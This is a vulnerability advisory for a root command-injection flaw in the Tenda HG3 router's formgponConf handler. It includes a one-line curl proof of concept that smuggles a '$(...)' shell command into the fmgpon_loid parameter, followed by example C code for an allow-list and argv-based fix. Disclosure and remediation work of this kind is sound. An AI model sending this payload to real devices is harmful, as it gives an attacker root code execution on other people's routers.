Information

Vendor of the products:    Tenda

Vendor’s website:   https://www.tendacn.com/

Reported by:    Zhuang Haoran (1851805232@163.com)

Affected models and versions:

Tenda HG3 (HARD_VERSION=V2.0 , Version: 300003070)

Firmware download address:

https://www.tendacn.com/material/show/787197496692805

Overview

A remote code execution vulnerability exists in Tenda HG3 IoT devices. It is caused by request parameters that are not filtered before being concatenated into a command. Attackers can exploit this vulnerability to access internal interfaces and thereby execute arbitrary code on the device.

Vulnerability details

When the request URL is /boaform/admin/formgponConf, the server calls the function pointer registered for formgponConf.

The parameters are concatenated into the command without any filtering.

When fmgpon_loid or fmgpon_loid_password is set to a value of the form "$(<command>)", the command is executed as root.

PoC

curl -i 'http://127.0.0.1:8088/boaform/admin/formgponConf' -H 'Content-Type: application/x-www-form-urlencoded' --data 'fmgpon_loid=te"$(id >/tmp/a)"st&fmgpon_loid_password=test12345&fmgpon_ploam_password=ploam12345&omci_olt_mode=0&apply=Apply+Changes&submit-url=%2Fgpon.asp'
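
The handler-side fix for this class of bug, as an added example that is not Tenda's code: check each value against an allow-list and pass it to the helper as a separate argv entry instead of building a shell string. The function names, the helper path argument, the 24-character limit and the permitted character set are assumptions.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define GPON_VALUE_MAX 24 /* assumed limit, not taken from the firmware */

/* Allow-list check (assumed policy): 1..GPON_VALUE_MAX characters from
 * [A-Za-z0-9_]. Quotes, '$', backticks, ';', '|', spaces and a leading
 * '-' (option injection into the helper) are all rejected. */
int gpon_value_is_safe(const char *s)
{
    if (s == NULL)
        return 0;
    size_t n = strlen(s);
    if (n == 0 || n > GPON_VALUE_MAX)
        return 0;
    for (size_t i = 0; i < n; i++) {
        char c = s[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '_';
        if (!ok)
            return 0;
    }
    return 1;
}

/* Run a hypothetical helper binary with the values as separate argv
 * entries. No shell parses them, so "$(...)" is never expanded.
 * Returns the helper's exit status, or -1 on rejection or failure. */
int apply_gpon_conf(const char *helper, const char *loid, const char *password)
{
    if (!gpon_value_is_safe(loid) || !gpon_value_is_safe(password))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)helper, (char *)loid,
                               (char *)password, NULL };
        execv(helper, argv);
        _exit(127); /* reached only if execv failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The argv-based call alone removes the shell from the path; the allow-list is a second layer that also keeps unexpected bytes out of whatever the helper does with the values.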